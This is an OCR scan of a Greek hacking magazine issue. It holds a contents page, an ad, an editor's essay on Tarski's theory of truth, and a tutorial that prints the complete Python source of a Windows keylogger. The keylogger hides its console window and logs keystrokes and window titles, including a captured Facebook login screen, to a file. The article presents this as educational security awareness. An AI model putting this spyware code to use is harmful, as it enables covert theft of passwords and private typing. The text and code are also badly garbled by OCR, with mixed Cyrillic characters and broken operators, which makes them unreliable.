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Επίδειξη stack overflow 
Φτιάξτε τον δικό бас keylogger 
Αυτόματος αποκλεισμός των attackers 
Νέα πνοή ζωής για ro σπασμένο Android tablet 
Δημιουργία φορητών πακέτων µε κώδικα Python 


- 


Βυσσινάδα µε ανθρακικό 


Τι εἶναι η Αλήθεια; 


O катаскопос που γύρισε 
απ' τα πλήκτρα 


Μπορείτε πλέον να φτιάξετε τον πρώτο σας 
keylogger, σε Python. Σας δείχνουμε πώς. 


ειξη stack overflow στα Winc 


Άλλο η θεωρία, άλλο η πράξη. Αυτή τη 
φορά επικεντρώνουμε στο δεύτερο :) 


Φτηνό Android-based tablet που έπεσε, 
έσπασε και τώρα μοιάζει να εἶναι εντελώς | 
άχρηστο. Η έµφαση εἶναι στο "μοιάζει". | 


Θέλετε να μάθετε πώς γράφονται τα payloads, 
που χρησιμοποιούνται στις επιθέσεις; 
Νομίζουμε πως θέλετε. 


O επιµενων ...KAEIC 


Έχετε server, бра ἔχετε και attackers που XTU- 
побу στα τυφλά, μολύνουν τα log files -- και δεν 
αποκλείεται να πετύχουν και κάτι. Ώρα να ETAU- 
ξήσετε σηµαντικά τα µέτρα προστασίας. 


Βγαλτε βολτα την Python [μερος 1] 


Φορητός κώδικας σε Python. Μάθετε πῶς µπο- 
ρείτε να τον έχετε. Το γιατί «θέλετε: να τον ἔχετε 
θα φανεί στο επόμενο τεύχος ;) 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Варелас 

Σύμβουλοι ёкбоспс Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Γιῶργος Αραβίδης, Παναγιώτης Βαρελάς, Χρήστος 


Βαρελάς, Ανδρέας Βενιέρης, Γιώργος Γιάννου, Χρήστος 
Θεμελής, Μανώλης Κιαγιάς, Ιωάννης Κονιάρης, Πέτρος 
Κυλαδίτης, Γιώργος Μελέκος, Νίκος Μουρατίδης, Νικόλαος 
Σηφάκης, Μέσος Παπαδόπουλος (ТМ), Χρίστος Тоцпрас 


Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


To ηλεκτρονικὀ περιοδικὀ deltaHacker εἶναι συνδρομητικὀ και εκδίδεται and την Para- 
bing Creations δώδεκα φορὲς το χρὀνο, κάθε μήνα. Н Parabing Creations ἐχει την ёбра 
της στη Μαιώτιδος 3, 55133, Καλαμαριά. О δικτυακὸς τόπος του περιοδικού εἶναι στο 

. To email επικοινωνίας εἶναι το talk2us@deltahacker.gr και гібіка 
για τις συνδρομές εἶναι το subscriptions@deltahacker.gr. Οι γενικὲἐς πληροφορἱες για τις 
συνδρομὲς παρατίθενται στο και οι ἰδιες οι παραγγελίες 
γίνονται απὀ το - Όλες οι απὀψεις που εκφράζονται στα 
ἆρθρα δεν εκφράζουν απαραίτητα και τη γνώµη του περιοδικού. 


delta B 


HA@KER 


Στη 3η χρονιά και συνεχίζουμε ακάθεκτοι! 


^ | / 
Μηνιαίο περιοδικό deltaHacker, http://deltahacker.gr 


Ethical Hacking / Δίκτυα / Ασφάλεια / Προγραμματισμός / Ηλεκτρονικά 


Е twitter.com/deltaHacker 
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Power your startup with 


* clean energy 


Join GreenQloud's Truly Green™ startup program 
and take advantage of: 


Free Compute Qloud™ and C Access to our revered 24/7 "all 
Storage Qloud™ usage for six hands on deck" customer 
months support 

+ Highly scalable, easy-to-use Features in GreenQloud's 
cloud services at your fingertips, marketing communications 
in seconds 

| Mentorship for you and your Become part of our global 
team with our executive team in ο startup community now! 


any of the following areas: 
cloud architecture; software 
engineering or software 
development; business model 
design; marketing; sales and 
product strategies; and human 
resources 


ae greengloud For more information, please visit www.greengloud.com/startup-program 
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Αγαπητοί роў, 


Σήμερα δεν είναν Παρασκευή 25 του μηνού, καν δεν βρίσκομαι στην ai- 
θουσα αναμονής του αεροδρομίου. Φυσικά δενβιίνω καφέ εσπρέσο και δεν 
ἔχω μόλις αρχίσεν να σας γράφω την επιστολή Που. 

= b 


Μπροστά роў δεν βρίσκεται η γραφομηχᾶνή, καν шас καν δεν χρειάζεταν 
να περιμένω (αφού η πτήση µου δεν θα πετάξει σε τρεις ώρες) δεν αναρω- 
τνέµαν καθόλου Yla το τν θα άξιζε ο κόπος να σχολιάσω. Όπως εἴπαμε, οὔτε 
καθισμένος στην αίθουσα αναμονής εἴμαν, οὔτε έχω ξεκινήσεν να γράφω την 
επιστολή μου. 


O ανιώνός, που δεν εἶναι µαζί роў, δεν EXEL πάεν στο Boots για να ayo- 
ράσεν PTOUXGAGKL µε νερό γιατί δεν πετάει οὔτε αυτός σήμερα, πον δεν εἰ- 
vat Παρασκευή 25 του μηνού. 


Αυτές τις τελευταίες εβδομάδες που δεν πήγαινα, σχεδόν καθημερινώς, 
στη Βιβλιοθήκη, δεν µε απασχολούσε καθόλου το ερώτημα της αλήθενας. 
Ούτε ένα βιβλίο δεν άνοιξα για το θέµα, καν ον προσεγγίσεις των διαφόρων 
φιλοσόφων που δεν µελέτησα δεν µου φάνηκαν καθόλου ενδιαφέρουσες, ούτε 
хау ανεπαρκείς. 


Μου έμεινε, όμως, η προσέγγιση του Τάρσκι: Н αλήθεια είναν κατηγόρημα 
που αναφέρεταν σε προτάσεις PLAG γλώσσας. Міс. πρόταση civar αληθής av 
(καν µόνο αν) περιγράφει / αντικατοπτρίζει / αντιστοιχεί σε µια συγκεκρι- 
μένη πραγματικότητα. 

"The cat is on the mat" is true if and only if the cat is on the 
mat. 


Ἰσεκάρουμε: Είναν η γάτα στο χαλάκι; Είναν. Apa µια πρόταση που µας 
AEEL πως "η γάτα είναν στο χαλάκν", είναν αληθής. 


Ἰσεκάρουμε ξανά. Έφυγε η γάτα από то χαλάµι; Χάθηκε το χαλάκι} Δεν 
είχαμε ποτέ γάτα; Н γάτα µας δεν κάθεται ποτέ στο χαλάκν, γνατί δεν της 
αρέσει; 

Τότε το "η γάτα είναν στο χαλάκν" είναν φευδής. 


O Τάρσκι ήταν Μαθηματικός, καν η µέριμνά του ήταν μαθηματική περισ- 
σότερο παρά φιλοσοφική. Προσεγγίζοντας την αλήθενα шс ιδιότητα προτά- 
σεων шас (τυπικής) γλώσσας απομακρυνόταν από µια φιλοσοφική παράδοση 
που την εξελάµβανε (την αλήθεια) ως μεταφυσική ποιότητα της πραγµατι- 
πότητας. Για τον Tapoxt, δηλαδή, η έννοια της αλήθειας δεν θα μπορούσε 
να εννοηθεί παρά µόνο шс ιδιότητα προτάσεων µιας (τυπικής) γλώσσας, LOL= 
ότητα που εκφράζεται σε µια άλλη (τυπική) γλώσσα, ανώτερης τάξεως алб 
την αρχική == 8 αλλιώς µμεταγλώσσα της αρχικής. 

То "τυπική" το βάζω σε παρένθεση, αλλά η έμφαση πάεν εχεί. Гіс τον 
Ἰάρκον, όπως καν γνα πολλούς φιλοσόφους της λογικής, όλο το ζουμί Bpi- 
σκεταν στη διαφοροποίηση μεταξύ φυσικών καν τυπικών γλωσσών. 


Φυσική είναν η καθημερινή, ανθρώπινη γλώσσα == τα αγγλικά, τα γερµα- 
νικά κ.λπ. TUM) γλώσσα είναν pla γλώσσα ре πολύ συγκεκριμένες προδια- 
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урафес, όπως, π.χ., η Άλγεβρα ἡ η Μαθηματική Λογική. 
(Σημειώστε, YLA παράδειγµα, πως η έννοια της μεταγλώσσας εἶναν yr) 
εφαρμόσυμη στις φυσικές γλώσσες.) 


Be that as 1t may, πον θα λέγανε ov γείτονές μον των τελευταίων δύο 
μηνών, ауто που εγώ βρίσκω ενδιαφέρον είναν η ομοιότητα της προσέγγισης 
του Τάρσκν µε αυτήν του Θωμά Ακινάτη καν των ἄλλων σχολαστικών φιλοσό- 
φων του Μεσαίωνα. 


Γνα τον Απινάτη, θυμίζω, η αλήθεια οριζόταν шс η αντιστοίχιση μεταξύ 
διανοήματος жол πράγματος: "Veritas est adaeauatio intellectus et 
rei". 


Δεν θέλεν πολλή προσπάθεια να δεν κανείς πως ον έννοιες "πρόταση µας 
(τυπικής) γλώσσας" καν "διανόημα" δεν απέχουν και πάρα πολύ, και OTL, 
αντιστοίχως, ον бро, "πράγμα" καν "πραγματικότητα" εἶναι σχεδόν συνώνυ- 
μον. 


Βανασκέφτομαν, λοιπόν, αυτό που μόλις σας έγραφα, OTL δηλαδή то ζου- 
i βρίσκεται στη διάκριση μεταξύ φυσικών καν τυπνκών γλωσσών, καν ανα- 
ρωτνέμαν. Αναρωτιέμαι για το αν είναν πράγματι θεμελιώδης == τόσο θεµε- 
λνώδης бсо θα ήθελε о Таракі. 


То παράδειγµα µε τη γάτα καν το γατάκιν, осорро, το χαλάκν, δεν ήταν 
του γούστον του Tapxor. O Τάρσκι θεωρούσε OTL το πεδίο αναφοράς του 
ορισμού του περί αλήθενας εἶναι µόνο ον προτάσεις PLAG τυπικής γλώσσας” 
πίστευε OTL είναν παταχρηστικὀ να τον χρησιμοποιείς σε προτάσεις της φυ- 
συκῆς (ανθρώπινης) γλώσσας. 


Тора. αυτή ту συζήτηση είναν πολύ µεγάλη αλλά να, σήµερα, που δεν είναν 
Παρασκευή 25 του μηνού, xv εγώ δεν βρίσκομαι στην αίθουσα αναμονής του 
αεροδρομίου, κάτι µε προβληματίζει. 

Προτείνω το εξής: 

Ας κάνουμε µια παύση. Ας επιστρέφουµε στην πρόταση µε την οποία 
άνοιξα τη σηµερινή µου επιστολή καν ας τη βάλουμε σε εισαγωγικά. 

θα εξετάσουμε το βαθµό αληθείας της. 

"Σήμερα δεν είναν Παρασκευή 25 τον μηνού, καν δεν βρίσκομαι στην ai- 
θουσα αναμονής του αεροδρομίου. Φυσικά δεν πίνω καφέ εσπρέσο και δεν 
ἔχω μόλις αρχίσεν να σας γράφω την επιστολή μον." 
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Лоўтбу; Αληθής ἡ Φευδής; 

Υπό µία έννοια είναν Φευδής. Διότν σήμερα, την ώρα που σας έγραφα 
εκείνες EXEL τις γραμμές, ήταν πράγματι 25 του μηνού (πού να το ξέρετε 
εσείς, βέβαια, αλλά ήταν), ні εγώ βρισκόμουν πράγματι στην αίθουσα ava- 
μονῆς, έπινα εσπρέσο, καν είχα μόλις αρχίσει να σας γράφω την επιστολή 
μου. 


Ψευδής λοιπόν γνατί η πρόταση ερχόταν σε αντίθεση µε αντικενμενικά 
δεδοµένα της πραγματικότητας. 

Όμως civar καν αληθής. Λιότι, πράγματι, σήµερα δεν εἶναι (πλέον) 25 του 
μηνού, δεν βρίσκομαι (πια) στην αίθουσα αναμονής, δεν πίνω εσπρέσο (πάεν 
αυτός), καν δεν έχω μόλις αρχίσεν να σας γράφω την επιστολή (βρίσκομαι 
ἤδη µετά τα μισά). 

Τελικά τν είναν η πρόταση, αληθής ñ Φευδής; Πώς μπορούμε να αποφασί- 
σουμες 

Δεν ξέρω. Μοιάζεν να εἶναι καν τα δύο. H μάλλον μουάζευ να είναν eive το 
ἕνα είτε το άλλο, ανάλογα µε την οπτική γωνία υπό την οποία την εξετά- 
ζουμε. Καν ὀχν µόνο την οπτική γωνία. Μονάζεν va εξαρτάται сло το χρόνο 
καν ало τον χώρο, ακόμα KL ало τον αναγνώστη. 


Σήµερα για ποιον; Iva péva που δαχτυλογραφώ την πρόταση ή γνα εσάς 
που την διαβάζετε: Καν ποιος βρίσκεται (ή δεν βρίσκεται) στην αίθουσα 
αναμονής του αεροδρομίου; Εγώ που (δεν) γράφω την πρόταση ἡ εγώ, o 
αναγνώστης της HON γραμμένης πρότασης» 

Μπλέξυμο. 

Μήπως είχε δίκιο τελικά ο Τάρσκι, καν ο ορισμός του δεν πιάνει για φυ- 
σνκές үлшааєс̧; 

θα έλεγε κανείς OTL VAL. Στις προτάσεις µιας φυσικής γλώσσας о ανθρώ- 
πινος παράγοντας (n οπτική γωνία, εξωτερικές συνθήκες όπως ο χρόνος, 

ο τόπος κ.λπ.) δείχνει να εµπλέκεταν περισσότερο оло OOO θα ήθελε ένας 
Μαθηματικός. 


Είναι, όμως, τόσο ξεκάθαρο καν απλό; 


Αγαπητοί роў, беў έχω χρόνο να αναλύσω το πρόβλημα αυτό εδώ, αλλά 
να, καθώς περιμένω στην αίθουσα αναμονής του αεροδρομίου να µας καλέ- 
бору για επιβίβαση, απορώ. Όταν µας διαβεβανώνεν o Τάρσχκι πως "E 'р' ei- 
ναν αληθής αν καν μόνο αν p", TL спрабуе αυτή η µικρή λέξη, "буо": 

Tv ρόλο παίζεν αυτό το "είναν"; Tv κάνει! Περιγράφεν pra διαδικασία 
(π.χ., OVYHPLON)$ Καταδεικνύει ένα κατηγόρηµα (π.χ., ταυτότητα); Κατονο- 
μάζεν ша κατάσταση: 


Καν ὀχν μόνον αυτό: Поў βρίσκεταν αυτό то "εἰναν'1 Εντός ἡ εκτός χρό- 
νου; Σε ένα Σύμπαν блох δεν υπάρχεν χρόνος, π.χ., στο δικό µας "Σύμπαν", 
λίγο "πριν" το рлуўх рхоуүх, τν νόημα EXEL να λέμε OTL κάτι "буо"; 

Μήπως απλά καν μόνο λέγοντας πως κάτι "εναν" ανοίγουμε µια μνκρή 
κερκόπορτα από όπου επιτρέπουμε να τρυπώσουν διάφορα περίεργα πράγ- 
ματα: 

The plot thickens, που θα λέγανε ον φίλον µας ον Άγγλου. 

Απαντήσεις δεν έχω, αγαπητοί pov. Το µόνο που ξέρω είναν πως σήμερα, 
25 тоў μηνού, ολομληρώνω την επιστολή роў καν ετονμάζομαν, µε τον ανι- 
Φιό, να επιστρέφω αεροπορικώς στα πάτρια εδάφη της γαλανής µας πατρί- 
δας. 

Or not. 


Бас ασπάζοµαν 
θείος Ακάκνος 
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Skill: Intermediate 
Tags: keyloggers, Python 


Ο κατάσκοπος που γύρισε an' τα πλήκτρα 


Н κρυπτογράφηση αποτελεῖ ша καλἠ απάντηση στους απανταχού 
κατασκόπους και στη δίψα τους για τα προσωπικά µας δεδομένα. Δεν 
πρὀκειται όμως για πανάκεια. Υπάρχει βλέπετε µια µἐθοδος κατασκοπείας 


που στοχεύει ακριβώς εκεἰ опоо δημιουργούνται τα δεδοµένα µας: Στο 
πληκτρολόγιο! Και η περὶ ης o λόγος μέθοδος, δεν εἶναι ἄλλη ano το 
keystroke logging. 


РА ΄ 1 ΄ 
0 κατάσκοπος που γύρισε απ τα πλήκτρα 
PPP 


Н αυξανόμενη χρήση της τεχνολογίας бе каве πτυχή της καθημερινότητας npo- 
σελκύει OAO και περισσότερους εισβολεἰς/επιτηρητὲς της ψηφιακἠς µας ζωής. Eire 
μιλάμε για μεμονωμένα ἁτομα eire για εταιρείες eire για επίσημες κρατικὲς οντότη- 
τες (ξέρετε, µε ονόματα που αποτελούνται ката παράδοση апо τρία γράμματα), o 
στόχος εἶναι πάνω като o ἰδιος: Н συλλογὴ боо το δυνατὸν περισσότερων πληρο- 
форіфу γύρω апо τις συνἠθειἐς µας, µε σκοπὀ την ἄμεση ἡ την ἐμμεση αποκόµιση 
κέρδους. Το κέρδος μπορεί να μην εἶναι πάντα χρηματικὀ, ὁπως έχουμε συνηθίσει va 
το σκεφτόμαστε, αλλά µπορεί να περιλαμβάνει την ηθικἠ ικανοποίηση, τη βοήθεια 
στην επἰτευξη £vóc ἄλλου στὀχου κ.ο.κ. 


Па να επιτελἐσουν το ἐργο τους, οι επἰδοξοι κατάσκοποι χρησιμοποιούν διάφορα 
εργαλεἰα και τεχνικές. Στο περιοδικὀ έχουμε δει παραδείγματα sniffing κι ανάλυσης 
πακέτων δεδομένων, επιθέσεων Man-in-The-Middle κ.ο.κ. Στις περισσότερες περι- 
πτώσεις, η κρυπτογράφηση των δεδομένων µιας σύνδεσης αποδεικνύεται επαρκἠς 
ὥστε οι επιτιθέµενοι να κάνουν µια τρύπα στο νερὀ. Υπάρχει όμως και µια µἐθοδος 
υποκλοπής δεδοµένων, αρκετά πιο UNOUAN κι επικἰνδυνη, που δεν αντιμετωπίζεται 
µε µέτρα ασφαλεἰας της επικοινωνίας. Μάλιστα, τα δεδοµένα που συλλέγονται μ' 
αυτἠ τη µἐθοδο αφορούν каде δραστηριότητά µας κι OXI μόνο астёс nou σχετίζονται 
με ro δίκτυο. Αναφερόµμαστε στο key logging, που πραγμµατοποιεἰται µε τους періфп- 
μους keyloggers. Στη συνέχεια του ἄρθρου θα πούμε δυο λόγια για την ιστορἱα καὶ 
τις κατηγορἰες αυτών των προγραμμάτων, αλλά δεν θα περιοριστούµε στη θεωρία. 
Πολὺ περισσότερο, θα κατασκευάσουμµε κι ἑναν біко µας keylogger, ὥστε va δεΐξου- 
µε посо εὐκολα θα μπορούσαμε να NEGOUHE кі εμεὶς θύματα еудс επιτιθἐµενου που 
--Κύριος οἶδε үгаті— µας &ҳ βάλει στο μάτι. 


Αποστολή kai πρώτη εμφάνιση 


Н µἐθοδος rou key logging (ñ keystroke logging) προβλέπει την παρακολούθηση kal 
την καταγραφἠ της χρήσης του πληκτρολογίου, µε τη βοήθεια λογισμικού ἡ εξει- 
δικευµένου υλικού (ñ και των δύο). Οι плпрофоріес που συλλέγονται µε αυτὴ την 
μέθοδο ποικίλουν. Υπάρχουν απλὲς υλοποιήσεις που περιορἰζονται στην απαρίθμηση 
των πλήκτρων που πατάει ο χρήστης, μέχρι και πολύ πιο εξελιγμένες, nou катаура- 
φουν ra ενεργἁ προγράμματα, τη θέση του ποντικιού, τα πατήματα κουμπιών στην 
οθόνη (та κλικ), τα περιεχόμενα της οθὀνης µε τη λήψη screenshot, τα δεδοµένα 
που βρίσκονται στο πρὀχειρο του συστήματος к.а. Ένας keylogger, eire πρὀκειται 
για проурарра εἶτε για συσκευή, δεν περιορίζεται κατ' ανάγκη στην καταγραφή. 
Mnopei επιπρόσθετα va στείλει τα δεδοµένα που ἐχει συλλέξει σε εκείνον που τον 
εγκατέστησε. 


Οι keyloggers δεν αποτελούν καινούργιο φρούτο. Το αντίθετο наліста: To πρὠτο 
παράδειγµα software keylogger εμφανίστηκε το 1983 στο usenet group ονόματι net. 
unix-wizards και εἶχε δημιουργηθεί апо Tov Perry Kivolowitz. To проүрарра ἦταν 
σε θἐση va καταγράφει τους "εισερχόμενους" χαρακτήρες, λαμβάνοντας ra σχε- 
тіка δεδομένα апо τον πυρῆνα του λειτουργικού συστήματος. Αλλά η ιστορία των 
keyloggers πηγαίνει ακόμα πιο παλιά. Αρκεἰ να σκεφτούμε ὁτι то 1970 καταγράφηκε 
η πρώτη επιτυχημένη εγκατάσταση keylogger апо μυστικὲς υπηρεσίες, σε NAEKTPO- 
νικὲς γραφομηχανὲς πρεσβειών. 


15 


k" 


Ένας τυπικὀς PS2 keylogger. Οι keyloggers αυτού 
TOU τύπου εἰναι аркета ύπουλοι, καθώς εἰναι EUKO- 
Ло να τους μπερδέψει κανείς για μετατροπείς USB 
σε PS2. 


keylogger 


Ένας τυπικὀς keylogger yia πληκτρολόγια USB. Н 
συσκευασία rou keylogger μοιάζει µε Eva παράξενο 
аутапторакі ano USB σε USB! 
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Κατηγοριοποίηση 


Οι keyloggers διακρίνονται σε боо μεγά- 
λες κατηγορἰες ανάλογα µε την "υπόστα- 
on" τους. Н πρώτη κατηγορἰα περιλαμ- 
βάνει τους keyloggers που υλοποιούνται 
μέσω λογισμικού, ενώ η δεύτερη αυτούς 
που υλοποιούνται µέσω hardware. Φυσι- 
ка, δεν πρέπει να µας προκαλεἰ ἐκπληξη 
και ο συνδυασμός αυτών των δύο. 


Οι software keyloggers μπορούν να εἰ- 
σέλθουν σ' Eva σύστημα εἶτε ως GUTOVO- 
μα προγράµµατα, εἶτε ως τμήματα ενὸς 
Trojan Horse ἡ ἄλλου malware. Εξάλλου, 
αυτού TOU εἶδους τα катаскопестіка 
εργαλεία ενδέχεται να αποτελούν кала 
κρυμμένα rootkits ἡ να βρίσκονται μέσα 
σε παραποιηµένους drivers για τις OU- 
σκευὲς εισόδου. Κάποιοι keyloggers δεν 
παρεμβαίνουν στον πυρῆνα rou λειτουρ- 
γικού για να υποκλέψουν τη ὅραστηρι- 
ὀτητα του χρήστη, αλλά επιστρατεύουν 
µια µἐθοδο που ονομάζεται memory 
injection. Εν ολίγοις, οι keyloggers αυτού 
TOU εἶδους καταφέρνουν να αποκτήσουν 
πρόσβαση στις κατάλληλες περιοχὲς 
της μνήμης και παρακολουθούν ἐμμεσα 
τη δραστηριότητα του χρήστη αλλά µε 
πλήρη επιτυχία. Κάποιες απλούστερες 
υλοποιήσεις εκτελούνται ως κανονικά 
προγράµµατα και παρακολουθούν το 
"user input" χρησιμοποιώντας λειτουργἰ- 
ες που παρέχει το λειτουργικὀ σύστημα. 
Τέλος, μπορούμε να διακρίνουμε και µια 
nio εξειδικευμένη катпүоріа keyloggers, 
που λειτουργεἰ μέσα апо δικτυακούς TÒ- 
πους και καταφέρνει να συγκεντρώσει 
бла τα events που παράγει ο χρήστης 
στον browser. 


Οι hardware keyloggers παρουσιάζουν 
επἰσης μεγάλη поікіліа. Μια ευρέως δια- 
δεδομένη karnyopia εἶναι αυτή nou nepi- 
λαμβάνει συσκευὲς PS2 ἡ USB, οι οποίες 
παρεμβάλλονται μεταξύ του υπολογιστή 
και του πληκτρολογίου. Н τοποθἐτησἡ 
τους πραγματοποιείται αρκετά εὐκολα, 
αλλά αν οι σχετικὲς θύρες του υπολογι- 


РА ΄ 1 ΄ 
0 κατάσκοπος που γύρισε απ τα πλήκτρα 
PPP 


OTN βρίσκονται σε κοινἠ θέα ἑνας παρατηρητικὸς χρήστης θα εντοπἰσει αµέσως TOV 
"корто". Υπάρχουν όμως και hardware keyloggers που τοποθετούνται στο Χεσωτερι- 
KO* των πληκτρολογἰων. 


Με τη διάδοση των ασύρματων πληκτρολογίων ἐκαναν την εµμφἀνισή τους και OI 
ασύρματοι keyloggers, nou δεν απαιτούν σύνδεση στον υπολογιστή του θύματος. 
Οι συγκεκριμένες υλοποιήσεις περιλαμβάνουν δέκτες, παρόμοιους µε εκείνους που 
¿xouv οι βάσεις των ασύρματων πληκτρολογἰων. Αν η επικοινωνία του πληκτρο- 
λογίου µε τον δέκτη πραγματοποιείται κρυπτογραφημένα, το ἐργο του υποκλοπέα 
γίνεται δυσκολότερο αλλά OX! και ακατόρθωτο. Πάντως, η χρήση ενσύρματου nàn- 
κτρολογἰου δεν µας θωρακίζει апо τους "ασύρματους κινδύνους". Κάποιοι Ελβετοὶ 
ερευνητές ¿xouv αποδείξει ὁτι εἶναι δυνατὴ η υποκλοπή των δεδομένων που nàn- 
κτρολογούνται σ' Eva ενσύρματο πληκτρολόγιο, апо απὀσταση έως και 20 µέτρων! 
Αυτό επιτυγχάνεται µε τη λήψη των ηλεκτρομαγνητικὠν παλμών που παράγονται 
апо το κύκλωμα του πληκτρολογίου. Τις περισσότερες форёс, βλέπετε, τα καλώδια 
σύνδεσης δεν ἐχουν ηλεκτρομαγνητικἠ θωράκιση και λειτουργούν oc κεραίες. 


Οι hardware keyloggers εγκαθίστανται δυσκολότερα σε σύγκριση µε αυτοὺς που 
στηρἰζονται στο software, av µη τι ἄλλο επειδἠ η τοποθέτησή τους προὐποθέτει τη 
φυσικἠ πρόσβαση στο μηχάνημα του θύματος. Ωστόσο πρὀκειται για εργαλεία που 
εἶναι εντελὼς абрата στο επἰπεδο Tou software κι ως εκ τούτου εἶναι πολύ πιο ὑπου- 
λα. Συνήθως, για τη συλλογὴ των πληροφοριών, ο επιτιθέμενος πρέπει να αποκτή- 
сє ξανὰ φυσικἠ πρὀσβαση στον υπολογιστή του θύματος. Ωστόσο, µια πρὀσφατη 
αποκάλυψη апо διάσημη κρατικἠὴ υπηρεσία πληροφοριών αναφέρει τη δημιουργία 
hardware keylogger µε δυνατότητα ασύρματης αποστολἠς των δεδομένων, σε anó- 
σταση αρκετών δεκάδων μέτρων. 


Πέρα ano ric δύο μεγάλες катпуоріес των keyloggers (software kai hardware) undp- 
χει και µια ενδιάμεση, аркета nio UNOUAN και δύσκολη στον εντοπισμό. Αυτή στηρἰ- 
ζεται στη χρήση "πειραγμένου" firmware για το BIOS του υπολογιστή του θύματος. 
Όπως αντιλαμβάνεστε, aurr| η µἐθοδος εἶναι αρκετά προχωρημένη και προὐποθέτει 
την απόλυτη στὀχευση σε κἄποιο συγκεκριμένο μηχάνημα. Τέλος, µια πιο εξωτικἠ 
μέθοδος υποκλοπἠς ακούει στο ὀνομα "ακουστικἠή κρυπτανάλυση". Πρόκειται για µια 
μέθοδο εκτίμησης των πλήκτρων που πατάει ο χρήστης, µέσω της συλλογὴς ενὸς 
Ἐμεγάλουξ δείγματος των NXWV που παράγονται ката την πληκτρολόγηση. 


Н δικἠ µας υλοποίηση 


Н ποικιλομορφία των keyloggers Εκεὶ Έξω (ТМ) εἶναι oxeóóv ανεξάντλητη. Όπως 
όμως αντιλαμβάνεστε, οι περισσότεροι και πιο διαδεδομένοι εἶναι αυτοί που υλο- 
ποιούνται σε software. Στο κάτω κάτω, oi software keyloggers εἶναι ευκολότερο va 
κατασκευαστούν αλλά και va "φυτευτούν" στο μηχάνημα του θύματος. Εμεἰς δεν 
θα ασχοληθούμε pe τις μεθόδους που αξιοποιούνται για την (προφανώς) παράνομη 
εγκατάσταση τέτοιων προγραμμάτων, αλλά θα σταθούμε στην επικινδυνὀτητἁ τους. 
Και yia va πάψουμµμε να μιλάμε θεωρητικἁ, θα μελετήσουμε rov κὠδικα ενὸς απλοϊκού 
keylogger που κατασκευάσαµε μόνοι рас. Πρόκειται για Eva μικρὀ проурацца σε 
Python, που καταγράφει τα πατήματα πλήκτρων και διάφορες ἄλλες χρήσιμες nàn- 
рофоріес. Αυτή η απλἠ εφαρμογή, εγκατεστημένη στο σύστημα ενὸς ανυποψίαστου 
χρήστη θα μπορούσε να αποκαλύψει όλα TOU ra μυστικά ανεξαιρέτως. Ακολουθεί о 
кабікас του... deltaLogger (κατεβάστε τον κι anó το http://bit.ly/dhe34logger ): 
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#deltaLogger - use for educational purposes only 


import pythoncom, win32console, win32gui, pyHook 


from datetime import datetime 


lastWindow = None 


log = "\n** deltaLogger log file - recodring stared @ " + 
str(datetime.now()) + " **\n" 
def OnKeyboardEvent(event): 
global lastWindow 
global log 
window = event.WindowName 
if event.Ascii == 27: 
WriteLog() 
exit() 
elif event.Ascii -- 13: 


key = "<ENTER>" 
elif event.Ascii == 

key = "<BACK SPACE>" 
elif event.Ascii == 

key = "<TAB>" 
elif event.Ascii == 

key = "" 
elif event.Ascii < 32: 

key = "<ASCII:" + str(event.Ascii) + ">" 
else: 


key=chr(event.Ascii) 


if window != lastWindow: 
log = log = Anss V 
ES " ΝΠ 


lastWindow - window 


+ window + " @ " + str(datetime.now()) 


log = log + key 
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35 if(len(log) » 200): 

36 WriteLog() 

37 Ίσα 5 "^ 

38 

39 def WriteLog(): 

40 global log 

41 fp = open("keylogs.txt","a") 
42 fp.write(log) 

43 fp.close() 

44 


45 window - win32console.GetConsoleWindow() 
46 win32gui.ShowWindow(window, 0) 

47 hm = pyHook.HookManager( ) 

48 hm.KeyDown = OnKeyboardEvent 

49 hm.HookKeyboard() 

50 pythoncom.PumpMessages() 


Οι арідноі στο ξεκίνημα των γραμμών xouv προστεθεἰ για τη διευκόλυνση της 
επεξήγησης του κὠδικα. Στη συνέχεια, λοιπὀν, ας δούµε noc ακριβώς AEITOUPYE! o 
υποτυπώδης keylogger nou κατασκευάσαμµε. 


Γραμμή 03. Εδώ εισάγονται ορισμένες βιβλιοθήκες που απαιτούνται апо την εφαρ- 
μογἠ µας. Πρὀκειται για τις pythoncom, win32console, win32gui και pyHook, nou 
δεν αποτελούν τμήμα της standard εγκατάστασης της Python. Πα να προσθέσετετις 
πρώτες τρεις арке! να εγκαταστήσετε το πακέτο pywin32, nou μπορείτε va κατεβά- 
σετε апо τη διεύθυνση https://sourceforge.net/projects/pywin32. Н δε βιβλιοθήκη 
pyHook βρἰσκεται στο ομώνυμο пакёто που µπορείτε να κατεβάσετε апо το https:// 
sourceforge.net/projects/pyhook. Οι εν Aóyo βιβλιοθήκες παρέχουν συναρτήσεις 
που επιτρέπουν το χειρισμό των συμβάντων (events) του πληκτρολογίου, καθώς και 
την απὀκρυψη του παραθύρου που εμφανίζεται órav εκτελεἰται Eva прбүранна σε 
Python. Όπως αντιλαμβάνεστε, σκοπεύουµε να κἄνουμε ro πρὀγραμμὰ µας αόρατο 
- τουλάχιστον στα μάτια ενὸς ανυποψίαστου χρήστη. Στην επὀμενη γραμμὴ (04) 
εισάγουµε, апо τη βιβλιοθήκη datetime, το ομώνυμο αντικείµενο που προσφέρει 
ша "кадар" αναπαράσταση της ημερομηνίας. Κάθε фора nou το πρὀγραμμὰ µας θα 
καταγράφει κάποιο πάτημα πλήκτρου, θέλουμε να συγκρατεί και τη χρονική στιγμή. 


Γραμμές 06 και 07. Ορἰζουμε τις μεταβλητὲς lastWindow και log. Н πρώτη θα пе- 
ριέχει τα στοιχεία του παραθύρου, апо το οποίο προήλθε το εκάστοτε συμβὰν nàn- 
κτρολόγησης. Θεωρήσαμε σημαντικὀ, βλέπετε, va καταγράφουμε *ка!* αυτὴ την 
πληροφορία. Н δεύτερη μεταβλητή θα περιέχει το "κείμενο" που ἐχει πληκτρολογη- 
θεἰ. Όπως θα παρατηρἠήσατε, η συγκεκριµἐνη μεταβλητή αρχικοποιεἰται µε µια ap- 
кета επεξηγηματικὴ τιμή: Mia συμβολοσειρά που περιγράφει бта θα ακολουθήσουν. 
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Αρχείο Επεξεργασία Μορφή Προβολή Βοήθεια 


** deltaLogger keylog file - recodring stared & 
2014-07-09 02:28:28.770000 ** 


:: Χωρίς τίτλο - Σηµειωματαριο 4 2014-07-09 
02:28:40. 677000 
ti na grafv tovra gia to delta hacker? 


:: Καλως ορίσατε στο Facebook - Συνδεθείτε, 
